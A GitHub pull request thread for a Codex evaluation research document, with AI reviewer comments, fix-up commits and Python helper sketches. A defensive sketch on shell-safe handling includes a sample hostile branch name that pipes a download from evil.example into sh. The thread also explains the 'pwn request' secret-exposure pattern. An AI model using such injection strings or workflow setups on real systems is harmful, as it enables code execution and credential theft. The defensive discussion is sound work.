docs(#274): Phase 0 Codex surface evaluation #277
Exhaustive descriptive research on the OpenAI Codex surface as of 2026-05: official integrations (Cloud, GitHub App, Action, CLI, Responses/Agents API), third-party tooling, best-known methods (BKMs) from public case studies, capabilities mapped to the github-actions pivot requirements, and gaps requiring follow-up spikes. Citations are retrieval-dated throughout. This is the Phase 0 deliverable for epic #273; the spec that consumes it lands in a separate PR after spike-driven revisions.

Closes #274
Refs #273
Claude finished @cbeaulieu-gt's task in 2m 26s.

Review of incremental changes
Summary

The incremental changes successfully address Codex P1/P2 findings from round 3. All four modifications improve accuracy and clarity. The … Two minor documentation quality opportunities are identified below.

Findings

🟢 Medium: Dependabot secrets citation could be more direct

Location: Line 162

The citation links to "configuring access to private registries for Dependabot," which is about registry authentication rather than the general Dependabot secrets namespace. While the information about Dependabot secrets is correct, a more direct source would be the main GitHub docs on Dependabot secrets (e.g., …).

Impact: Minor. Readers can still verify the claim, but the citation is indirect.

🟢 Medium: API key auth claim lacks primary source citation

Location: Line 542 (gotchas table)

The row states that "official OpenAI docs describe switchable modes" and references "OpenAI CLI documentation," but no specific URL is provided for the official docs. The only cited source is the third-party blog (correctly marked …).

Impact: Minor. The correction from "disables permanently" to "switchable modes" is likely accurate based on how CLI auth typically works, but a primary source link would improve verifiability.

What worked well

- ✅ Critical security correction (line 167): The revision correctly explains that …
- ✅ Dependabot workaround (line 160): Helpful addition explaining the Dependabot secrets namespace as a solution for Dependabot PR reviews.
- ✅ Pricing accuracy (line 276): Removed unverified markers and priority pricing tiers, added verified specs with proper citations.
- ✅ Nuanced auth guidance (line 542): Changed from binary "excludes" framing to a more accurate "switchable modes" explanation with practical implications.

Verdict: APPROVE
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: e5e88b1ca3
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
- Fix arithmetic in 50K-token review cost example ($0.26 -> $0.08)
- Qualify Tier 1 burst-capacity claim with 500K TPM ceiling
- Reconcile openai-api-key required-vs-conditional contradiction
- Extend plan-coverage matrix to include Free + Go tiers

Findings raised by chatgpt-codex-connector[bot] on the auto-review pass.

Refs #274, #277

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
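The corrected figure can be sanity-checked with a few lines of arithmetic. This is a sketch, not the doc's own calculation: it assumes the `gpt-5-codex` list prices from the pricing matrix quoted later in this thread ($1.25 per 1M input tokens, $0.125 per 1M cached input, $10.00 per 1M output) and a hypothetical 2,000-token review output. The real output length of a review is not stated here, so `output_tokens` should be replaced with measured values.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Pricing:
    """USD per 1M tokens, copied from the doc's pricing matrix."""
    input_per_m: float
    cached_per_m: float
    output_per_m: float


# gpt-5-codex row from the pricing matrix (assumed current; re-check before budgeting).
GPT_5_CODEX = Pricing(input_per_m=1.25, cached_per_m=0.125, output_per_m=10.00)


def review_cost(p: Pricing, input_tokens: int, output_tokens: int, cached_tokens: int = 0) -> float:
    """Estimated USD cost of one review call.

    cached_tokens is the portion of input_tokens billed at the cached rate.
    """
    if not 0 <= cached_tokens <= input_tokens:
        raise ValueError("cached_tokens must be between 0 and input_tokens")
    fresh = input_tokens - cached_tokens
    return (
        fresh * p.input_per_m
        + cached_tokens * p.cached_per_m
        + output_tokens * p.output_per_m
    ) / 1_000_000


# 50K-token diff plus a hypothetical 2K-token review comment.
cost = review_cost(GPT_5_CODEX, input_tokens=50_000, output_tokens=2_000)
print(f"${cost:.2f}")  # prints $0.08
```

At these prices the input alone costs $0.0625, so reaching the superseded $0.26 would take roughly 20K output tokens per review.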
💡 Codex Review
Reviewed commit: ad4ba1ebe8
- Resolve duplicated Pro plan columns in tier matrix: collapse the duplicate Pro ($100/$200) columns to a single Pro column with an `unverified:` note that internal rate-limit tiers within Pro are not exposed as distinct plan names in the pricing docs
- Recalculate burst-tier recommendation for 100+ PR waves: Tier 2 (1M TPM) throttles at a 5M-token burst; Tier 5 (10M TPM) is the first standard tier that covers the load without throttling; adds ingress rate-limiting as the realistic fallback when Tier 5 is not yet available
- Distinguish Codex Cloud (Plus+ only) from the Codex umbrella (all plans) at the §2.1 maturity line to reconcile with the Free/Go extension added in the prior fix-up commit (ad4ba1e)
- Qualify event-agnostic trigger claim with the forked-PR / Dependabot secrets gap: `pull_request` events from forks do not receive repo secrets, so `OPENAI_API_KEY` is undefined; documents `pull_request_target` and merged-base-queue as fork-friendly alternatives

Findings raised by chatgpt-codex-connector[bot] on ad4ba1e review pass.

Refs #274, #277
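The burst reasoning can be made explicit: under a tokens-per-minute (TPM) ceiling, a burst drains in roughly `burst / TPM` minutes, and anything beyond one minute's budget queues or is throttled. This is a back-of-envelope sketch, not OpenAI's actual rate-limit algorithm. It assumes a 100-PR wave at 50K tokens per review (the 5M-token burst above) and uses only the TPM ceilings named in this PR's fix-up commits; the full tier table should be checked against OpenAI's rate-limit docs.

```python
import math

# TPM ceilings named in this PR's fix-up commits; other tiers omitted on purpose.
TPM_CEILINGS = {
    "Tier 1": 500_000,
    "Tier 2": 1_000_000,
    "Tier 5": 10_000_000,
}


def burst_tokens(prs: int, tokens_per_review: int) -> int:
    """Total tokens if every PR in a wave is reviewed at once."""
    return prs * tokens_per_review


def minutes_to_drain(burst: int, tpm: int) -> int:
    """Whole minutes needed to push `burst` tokens through a TPM ceiling."""
    return math.ceil(burst / tpm)


def fits_without_throttling(burst: int, tpm: int) -> bool:
    """True if the whole burst fits inside a single minute's TPM budget."""
    return burst <= tpm


burst = burst_tokens(prs=100, tokens_per_review=50_000)  # 5,000,000 tokens
for tier, tpm in TPM_CEILINGS.items():
    print(tier, minutes_to_drain(burst, tpm), fits_without_throttling(burst, tpm))
```

Under these assumptions Tier 1 needs about 10 minutes and Tier 2 about 5, while Tier 5 absorbs the wave in one window, which matches the commit's recommendation.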
💡 Codex Review
Reviewed commit: 319f6d1158
P1 (correctness/safety):
- Replace CODEX_API_KEY with OPENAI_API_KEY in CLI auth section (was inconsistent with rest of doc and with openai/codex-action input contract)
- Add 'pwn request' safety caveat to pull_request_target recommendation, with GitHub Security Lab citation (fetched 2026-05-20)

P2 (citation rigor):
- Mark April-9 limit-regression multiplier (3.2x) as unverified community estimate; no primary OpenAI source confirmed the figure
- Mark Business tier limit-regression claim as unverified community estimate
- Mark harness engineering case study PR/team-size metrics as unverified; primary source inaccessible at write time (403); figures from search snippets
- Fix gpt-5.5 pricing cell: replace 'See ChatGPT pricing page' with unverified: marker pointing at API pricing URL, not subscription page

Findings raised by chatgpt-codex-connector[bot] on 319f6d1 review pass.

Refs #274, #277
💡 Codex Review
Reviewed commit: 2eb00d3865
> **Critical safety caveat for `pull_request_target`:** `pull_request_target` runs in the base-repo context with secrets, but the default `actions/checkout` step without arguments checks out the base ref, not the PR head. If a workflow under `pull_request_target` explicitly checks out the PR head (e.g., `with: ref: ${{ github.event.pull_request.head.sha }}`), it executes potentially-malicious code from the fork with full base-repo permissions, including secrets and write tokens. This is the well-known "pwn request" attack pattern. Mitigations:
>
> - Do NOT check out PR head code under `pull_request_target` unless absolutely necessary; if you must, gate on `author_association` (OWNER / MEMBER / COLLABORATOR) before any step that executes PR code.
> - Prefer a queued-review pattern where a workflow under `pull_request_target` only posts a review comment based on the diff text, not by executing PR code.
> - For `openai/codex-action` specifically: the action reads the diff via API (not via checked-out PR code), so it can run under `pull_request_target` safely provided no other step in the same job checks out fork code with `ref: ${{ github.event.pull_request.head.sha }}`.
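The `author_association` gate in the first mitigation can be sketched as a pre-check that runs before any step touching PR code. This is hypothetical and not part of `openai/codex-action`: it assumes the job reads the webhook payload from the file named by `GITHUB_EVENT_PATH` (which GitHub Actions sets) and trusts only the three association values the caveat lists.

```python
import json
import os
from typing import Optional

# author_association values the caveat treats as trusted.
TRUSTED_ASSOCIATIONS = frozenset({"OWNER", "MEMBER", "COLLABORATOR"})


def is_trusted_pr_author(event: dict) -> bool:
    """Return True only if the PR author has a trusted association with the repo.

    Missing fields are treated as untrusted, so the check fails closed.
    """
    pr = event.get("pull_request") or {}
    return pr.get("author_association", "") in TRUSTED_ASSOCIATIONS


def load_event(path: Optional[str] = None) -> dict:
    """Read the webhook payload GitHub Actions writes to GITHUB_EVENT_PATH."""
    path = path or os.environ["GITHUB_EVENT_PATH"]
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


if __name__ == "__main__" and os.environ.get("GITHUB_EVENT_PATH"):
    if not is_trusted_pr_author(load_event()):
        raise SystemExit("Untrusted PR author: skipping steps that execute PR code.")
```

Failing closed means a payload without `pull_request` (for example a `workflow_dispatch` run) is treated as untrusted.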
Correct pull_request_target safety note about diff source
The sentence claiming openai/codex-action "reads the diff via API" is incorrect for the action itself and can produce false-safe workflow guidance. openai/codex-action runs codex exec on the checked-out workspace/prompt; it does not automatically fetch PR diffs from GitHub. In pull_request_target workflows that avoid checking out PR head, this can lead to reviewing only base-branch content (or missing PR context entirely), so teams may think they are safely reviewing untrusted forks while actually getting incomplete/invalid review coverage.
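One hedged way to act on this comment without checking out fork code is to fetch the PR diff as plain text and include it in the prompt, in the spirit of the queued-review mitigation. The GitHub REST "get a pull request" endpoint returns a unified diff when requested with the `application/vnd.github.diff` media type. The sketch only builds and sends that request (owner, repo, number, and token are placeholders); how the text reaches `codex exec` is not shown and would need to be confirmed against the action's inputs.

```python
import urllib.request

GITHUB_API = "https://api.github.com"


def pr_diff_request(owner: str, repo: str, number: int, token: str) -> urllib.request.Request:
    """Build (but do not send) a REST request for a PR's unified diff.

    The diff media type asks GitHub for plain diff text instead of JSON,
    so no fork code is checked out or executed to obtain it.
    """
    url = f"{GITHUB_API}/repos/{owner}/{repo}/pulls/{number}"
    return urllib.request.Request(
        url,
        headers={
            "Accept": "application/vnd.github.diff",
            "Authorization": f"Bearer {token}",
            "X-GitHub-Api-Version": "2022-11-28",
        },
        method="GET",
    )


def fetch_pr_diff(req: urllib.request.Request, timeout: float = 30.0) -> str:
    """Send the request and return the diff text (performs a network call)."""
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")
```

This preserves the "never execute PR code" property, but the diff is still untrusted input, so prompt-injection content in it remains a concern for any agent that acts on it.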
| Output | Description |
|--------|-------------|
| `final-message` | Raw text output from `codex exec` |
**Supported event triggers.** Event-agnostic: any GitHub Actions event that allows `actions/checkout` before the step will work (`pull_request`, `push`, `workflow_run`, `issue_comment`, `workflow_dispatch`, `schedule`, etc.), **with one critical exception:** `pull_request` events from forked repositories (and Dependabot-authored PRs, which GitHub treats as fork-equivalent) do not receive repository secrets, so `OPENAI_API_KEY` will be undefined and the action will fail authentication. For fork-friendly review automation, use `pull_request_target` (which runs in the base-repo context with secrets available) or queue fork reviews via a separate workflow triggered against the merged base. The Codex GitHub App integration (§2.2), by contrast, runs cloud-side under OpenAI's own identity and does not have this constraint.
Qualify Dependabot secret behavior in auth failure claim
This line overstates Dependabot behavior by saying OPENAI_API_KEY will be undefined and auth will fail on Dependabot PRs. GitHub treats Dependabot like a fork for permission hardening, but workflows can still receive Dependabot secrets (not normal Actions secrets), so runs do not necessarily fail if the key is configured there. As written, this can cause maintainers to disable Dependabot-triggered reviews unnecessarily instead of wiring the correct secret type.
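A fail-fast check along these lines would turn a silent auth failure into an actionable message that distinguishes the two cases this comment separates. It is a sketch under two assumptions: `GITHUB_ACTOR` (set by GitHub Actions) identifies Dependabot runs as `dependabot[bot]`, and the key is exposed to the step as `OPENAI_API_KEY`, whether it comes from Actions secrets or from the separate Dependabot secrets store.

```python
import os
from typing import Mapping, Optional

DEPENDABOT_ACTOR = "dependabot[bot]"


def missing_key_hint(env: Mapping[str, str]) -> Optional[str]:
    """Return an explanation if OPENAI_API_KEY is empty, else None."""
    if env.get("OPENAI_API_KEY"):
        return None
    if env.get("GITHUB_ACTOR") == DEPENDABOT_ACTOR:
        return (
            "OPENAI_API_KEY is empty on a Dependabot run: Dependabot-triggered "
            "workflows read Dependabot secrets, not Actions secrets. "
            "Add the key to the Dependabot secrets store."
        )
    return (
        "OPENAI_API_KEY is empty: the run may come from a fork, which does not "
        "receive repository secrets, or the secret is not configured."
    )


# Only enforce inside GitHub Actions, so importing or local runs never exit.
if __name__ == "__main__" and os.environ.get("GITHUB_ACTIONS") == "true":
    hint = missing_key_hint(os.environ)
    if hint:
        raise SystemExit(hint)
```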
| Model ID | Context Window | Max Output | Input $/1M | Cached $/1M | Output $/1M | Notes |
|----------|---------------|------------|-----------|------------|------------|-------|
| `gpt-5-codex` | 400,000 tokens | 128,000 tokens | $1.25 | $0.125 | $10.00 | Responses API only; optimized for agentic coding |
| `gpt-5.3-codex` | `unverified:` | `unverified:` | $1.75 (std) / $3.50 (priority) | $0.175 / $0.35 | $14.00 / $28.00 | Standard and Priority processing tiers |
Use published GPT-5.3-Codex specs in the pricing matrix
The gpt-5.3-codex row marks context/max output as unverified and adds "priority" prices, but the official model page already publishes concrete values (400k context, 128k max output, and standard token pricing). I checked developers.openai.com/api/docs/models/gpt-5.3-codex, and this mismatch can materially skew cost/throughput planning by presenting unsupported or stale pricing assumptions as part of the core model comparison.
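With the published `gpt-5.3-codex` limits this comment cites (400K context, 128K max output), a pre-flight budget check for large diffs is straightforward. The sketch assumes the context window covers input plus output together and takes a caller-supplied token count; it does not tokenize anything itself, and the limits should be re-checked against the model page before use.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ModelLimits:
    context_window: int  # total tokens per request, assumed to include output
    max_output: int


# Figures the review comment cites from the model page.
GPT_5_3_CODEX = ModelLimits(context_window=400_000, max_output=128_000)


def max_input_tokens(limits: ModelLimits, reserved_output: int) -> int:
    """Largest prompt that still leaves room for `reserved_output` tokens."""
    if not 0 < reserved_output <= limits.max_output:
        raise ValueError("reserved_output must be in (0, max_output]")
    return limits.context_window - reserved_output


def fits(limits: ModelLimits, prompt_tokens: int, reserved_output: int) -> bool:
    """True if a prompt of `prompt_tokens` fits alongside the reserved output."""
    return prompt_tokens <= max_input_tokens(limits, reserved_output)
```

Reserving the full 128K output leaves 272K tokens for the diff and instructions; a smaller reservation frees more room for input.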
| April 9 limit model change | Limits shifted from message-count to reasoning-time measurement. `unverified — community estimate:` budgets burn up to 3.2× faster per minute on Business tier; primary OpenAI documentation confirming the multiplier was not located. Iterative CI workflows are disproportionately affected. | [community.openai.com/t/understanding-the-new-codex-limit-system-after-the-april-9-update/1378768](https://community.openai.com/t/understanding-the-new-codex-limit-system-after-the-april-9-update/1378768) (fetched 2026-05-20) |
| Business tier limit regression | `unverified — community estimate:` Business tier Codex limits regressed significantly in the April 9 update; community reports of users canceling due to "unmanageable" usage. No primary OpenAI changelog or blog post confirming the specific regression magnitude was located. | Same source as above. |
| Azure DevOps inline comment anchoring | `changeTrackingId` mapping is fragile; inline comments may fail silently. Must be validated per project before relying on it in a required branch policy. | [developers.openai.com/cookbook/examples/codex/build_code_review_with_codex_sdk](https://developers.openai.com/cookbook/examples/codex/build_code_review_with_codex_sdk) (fetched 2026-05-20) |
| API key mode excludes cloud features | Switching to API key (required for CI) disables Codex Cloud, GitHub App integration, Slack integration, and cloud-feature model rollout priority. | [blog.laozhang.ai/en/posts/codex-api-key-vs-subscription](https://blog.laozhang.ai/en/posts/codex-api-key-vs-subscription) (fetched 2026-05-20) |
Remove unsupported claim that API-key mode disables cloud features
This row presents a strong product limitation as fact (API key mode disables Codex Cloud/GitHub/Slack features) but cites only a third-party blog, while official OpenAI docs describe API-key and ChatGPT-plan usage as separate auth modes users can switch between (for example via codex logout and re-auth). Framing this as a hard disable can mislead platform decisions by suggesting teams must choose one surface permanently instead of running CI with API keys while still using cloud features interactively.
P1 (correctness):
- Correct false claim that openai/codex-action reads diff via API (it actually runs codex exec on the checked-out workspace; flagged by Codex's review of my round-3 fix, a real bug I introduced)

P2 (factual nuance):
- Qualify Dependabot secret behavior: the Dependabot secrets namespace exists and CAN provide OPENAI_API_KEY to Dependabot PRs
- Replace gpt-5.3-codex 'unverified' markers with published specs (400k context, 128k max output) per official model page
- Soften 'API-key mode disables cloud features' claim: auth modes are switchable per-session, not one-way exclusive

Findings raised by chatgpt-codex-connector[bot] on 2eb00d3 review pass.

Refs #274, #277
💡 Codex Review
Reviewed commit: 9cce871020
Community estimate: average ~$100–200/developer/month for full interactive use. CI-specific cost will be lower but depends heavily on diff size and review frequency.
Source: [developers.openai.com/codex/pricing](https://developers.openai.com/codex/pricing) (fetched 2026-05-20).
Cite the source for the monthly cost estimate
This line gives a concrete budgeting figure (~$100–200/developer/month) but the cited source is the OpenAI Codex pricing page, which does not provide that community estimate. Because this document is used for planning CI cost assumptions, an unsupported number can be mistaken for official guidance; either attach the actual community source and mark it clearly as unverified, or remove the estimate.
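Rather than lean on an uncited per-developer figure, a CI budget can be projected from the team's own volume. This sketch takes the per-review cost as an input (for example, the $0.08 from the corrected 50K-token example in the first fix-up commit); the PR volume and reviews-per-PR values in the usage line are hypothetical.

```python
def monthly_ci_cost(prs_per_month: int, reviews_per_pr: float, cost_per_review: float) -> float:
    """Projected USD per month for automated reviews.

    reviews_per_pr > 1 accounts for re-reviews on new pushes (synchronize events).
    """
    if prs_per_month < 0 or reviews_per_pr < 0 or cost_per_review < 0:
        raise ValueError("inputs must be non-negative")
    return prs_per_month * reviews_per_pr * cost_per_review


# Hypothetical team: 200 PRs/month, ~2.5 review passes each, $0.08 per pass.
print(f"${monthly_ci_cost(200, 2.5, 0.08):.2f}")  # prints $40.00
```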
**GitHub App integration (cloud product).** Posts reviews as `@codex`. The exact GitHub app installation identity (display name, username suffix) is `unverified:` from official docs. Community observations suggest it displays as "Codex (OpenAI)" or similar, but this is not confirmed from a primary source.
**Security note.** The December 2025 command-injection vulnerability (fully remediated February 5, 2026) allowed GitHub OAuth token theft via malicious branch names. The remediation involved stronger shell command protections, improved input validation, and reduced scope and lifetime of GitHub tokens in Codex containers. Teams should ensure Codex CLI is at a version post-remediation (any version current as of February 2026 or later).
Correct the remediation date for the command-injection issue
This sentence says the vulnerability was “fully remediated February 5, 2026,” but the cited disclosure timeline lists the technical fixes on January 22 and January 30 and describes February 5 as classification/disclosure permission. Using the wrong date can skew upgrade/compliance timelines for teams treating this document as a security reference.
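The vulnerability class described in this security note, attacker-controlled branch names reaching a shell, has a generic defense that applies to any workflow step, not only Codex. The sketch below is not OpenAI's fix. It shows two standard options: passing the ref as its own argv element so no shell parses it, or quoting it with `shlex.quote` when a shell string is unavoidable. The branch name is a hypothetical payload; `;`, `$`, `{`, and `|` are all legal in git ref names, which is why input validation alone is not enough.

```python
import shlex
from typing import List


def verify_branch_argv(branch: str) -> List[str]:
    """argv for `git rev-parse --verify refs/heads/<branch>`.

    Run with subprocess.run(argv) and no shell=True, so the name is never
    parsed by a shell. The refs/heads/ prefix also keeps a name like "-x"
    from being read as an option.
    """
    return ["git", "rev-parse", "--verify", "refs/heads/" + branch]


def verify_branch_shell(branch: str) -> str:
    """Shell-string form for when a shell cannot be avoided; the ref is quoted."""
    return "git rev-parse --verify " + shlex.quote("refs/heads/" + branch)


# Hypothetical attacker-controlled branch name.
hostile = "main;curl${IFS}evil.example|sh"
print(verify_branch_argv(hostile))
print(verify_branch_shell(hostile))
```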
**Authentication.** Requires `OPENAI_API_KEY` stored as a GitHub secret. Also supports Azure OpenAI via `responses-api-endpoint`. No subscription-based auth for the Action; an API key is the only supported path. This is consistent with OpenAI's guidance: "Use an API key. CI, SDKs, app backends, and headless jobs need explicit platform credentials."
Source: [blog.laozhang.ai/en/posts/codex-api-key-vs-subscription](https://blog.laozhang.ai/en/posts/codex-api-key-vs-subscription) (fetched 2026-05-20).
Replace third-party citation for claimed OpenAI guidance
The text presents a quoted “OpenAI guidance” statement but cites a third-party blog rather than an OpenAI source. Since this section drives authentication decisions for CI, attributing vendor guidance to a non-authoritative source can lead to incorrect policy assumptions; cite an official OpenAI doc for this claim or label it as third-party interpretation.
7. **Context window for `gpt-5.3-codex`.** The model docs page for `gpt-5-codex` was confirmed (400K tokens), but the `gpt-5.3-codex` context window is unverified. Spike: check [developers.openai.com/api/docs/models/gpt-5.3-codex](https://developers.openai.com/api/docs/models/gpt-5.3-codex).
8. **Enterprise access token support for `openai/codex-action`.** Enterprise Codex access tokens are documented for `codex exec` in non-interactive workflows. Whether they can be used as the `openai-api-key` input in `openai/codex-action@v1.8`, or whether a standard API key is strictly required, is not confirmed. Spike: check the Action's `action.yml` comments for the `openai-api-key` input description, and test with an enterprise access token if available.
Reconcile unresolved enterprise-token support with auth claims
This open question says it is not confirmed whether Enterprise access tokens work in openai/codex-action’s openai-api-key input, but earlier sections present the action’s authentication path as settled guidance. Leaving this unresolved while giving definitive auth direction creates contradictory integration advice and can cause teams to prematurely rule out a supported credential type; either verify and document behavior or downgrade earlier claims to explicitly unverified.
…de phase (#278)

* docs: codex-pivot spec rev 2 - dual-surface architecture (App + Action)

  Rev 2 incorporates spike #275 findings and the project-reviewer feedback on the conceptual v1. Architectural change: pr-review retires entirely (handled by the Codex GitHub App under subscription, zero in-repo YAML); the four write-side workflows migrate to openai/codex-action with API billing; the verb router collapses entirely since the App handles @codex review / @codex address feedback natively. Adds a mandatory shadow-mode phase with written kill criteria between App enablement and Claude pr-review retirement. Quality gate becomes a thin workflow filtered on the Codex bot's review state, escaping the severity-regex trap from #271.

  Refs #273, #275, #277

* docs: address project-reviewer findings on spec v2 (3 BLOCKING + 4 CONCERN + 2 NIT)

  BLOCKING:
  - `examples/**` and docs/consumer-onboarding.md DO exist on main (false negative in planner's verification step); add to touches, correct false claim, expand sub-issue #J's scope to cover them.
  - Shadow-mode duration logic rewritten: 7 days AND >=7 PRs binding floor; >=30 PRs is advisory, not blocking; closes the deadline trap.
  - codex-gate.yml YAML draft hardened: empty-SHA guard + description field + workflow-level statuses:write permission + filter to chatgpt-codex-connector[bot].

  CONCERN:
  - openai/codex-action @v1 pinning policy rescoped (precondition was unsatisfiable).
  - AGENTS.md sub-issue #A gains concrete acceptance test.
  - New sub-issue #O gates synchronize-event verification before Claude retirement.

  NIT:
  - S6 GHCR deletion sequencing note added.
  - S9 verb-router-retirement atomicity note added.

  Refs #273, #278 (this PR), #275 (spike findings unchanged).
* docs: address Claude pr-review findings on spec v2 (#278)

  MAJOR:
  - Shadow mode duration logic clarified (7d AND 7 PRs binding; 14d max; 30 PRs aspirational)
  - #M sequencing contradiction resolved: 30d GHCR clock gated on #M completion, not v3 release

  Medium:
  - #O sub-issue gains explicit timing (run during #A/#B, before shadow window)

  Nits:
  - Empty-SHA error message includes recovery hint
  - Redundant if-condition retained with explanatory comment
  - §8 observation methodology specifies structured PR-by-PR logging schema
  - #J acceptance test method specifies throwaway consumer-test repo
  - BLOCKING-#4 verification step now shows the git ls-tree command + 2026-05-20 date

  Findings from claude-action-runner[bot] review of e062774 → 07a08f0.

  Refs #273, #278

  Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* docs: complete Option-B propagation for #M audit timing (#278)

  The fix-up in 640e20a applied Option B to §9 row 12 (conditional 30-day clock) but left two references with Option-A "before-release" framing: #M's body and §13 Q3. This commit propagates Option B to both: #M runs post-release in parallel with #L; the GHCR-deletion clock is gated on #M completion; §13 Q3 marked resolved.

  Refs #273, #278

---------

Co-authored-by: Claude Auto-Fix <claude-autofix@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
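The `codex-gate.yml` hardening listed above (empty-SHA guard with a recovery hint, a description field, filtering to `chatgpt-codex-connector[bot]`) reduces to a small decision function. The spec's actual YAML is not shown in this thread, so this is a hypothetical Python rendering. It takes review objects shaped like GitHub REST pull request reviews (`user.login`, `state`, `commit_id`, `submitted_at`) and returns a commit-status `(state, description)` pair. The pass/fail policy and message texts are assumptions.

```python
from typing import Iterable, Mapping, Tuple

CODEX_BOT = "chatgpt-codex-connector[bot]"


def gate_status(head_sha: str, reviews: Iterable[Mapping]) -> Tuple[str, str]:
    """Map the Codex bot's latest review on `head_sha` to a commit status.

    Hypothetical policy: CHANGES_REQUESTED fails, any other submitted
    review passes, and no review yet leaves the status pending.
    """
    if not head_sha:
        # Empty-SHA guard: refuse to post a status against nothing.
        return "error", "Empty head SHA; re-run the gate on the PR."
    codex_reviews = [
        r for r in reviews
        if (r.get("user") or {}).get("login") == CODEX_BOT
        and r.get("commit_id") == head_sha
        and r.get("submitted_at")  # skip reviews without a submission time
    ]
    if not codex_reviews:
        return "pending", "Waiting for Codex review of this commit."
    # GitHub returns UTC ISO 8601 timestamps, which sort lexically.
    latest = max(codex_reviews, key=lambda r: r["submitted_at"])
    if latest.get("state") == "CHANGES_REQUESTED":
        return "failure", "Codex requested changes."
    return "success", f"Codex review state: {latest.get('state')}."
```

Filtering on both the bot login and `commit_id` keeps a stale review of an earlier push, or a human reviewer's verdict, from satisfying the gate.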
Summary
Lands the Phase 0 Codex research deliverable produced for issue #274 (under epic #273). Single-file addition under `docs/superpowers/research/`.

What's in it

`docs/superpowers/research/2026-05-20-codex-evaluation.md`: exhaustive descriptive evaluation of the OpenAI Codex surface (Cloud, GitHub App, `openai/codex-action`, CLI, Responses/Agents API) with retrieval-dated citations. No recommendations; the spec at `docs/superpowers/specs/2026-05-20-codex-pivot.md` (separate PR) consumes it.

Why it lands separately from the spec
The spec is being revised on a follow-up branch to incorporate spike #275 findings (Codex App works on org-owned repos under subscription; context-aware reading verified). The research doc is unchanged by the spike, so it lands first to provide a durable reference for the revised spec.
Closes
Closes #274 (Phase 0 research deliverable)
Refs #273 (epic)
🤖 Generated by Claude Code on behalf of @cbeaulieu-gt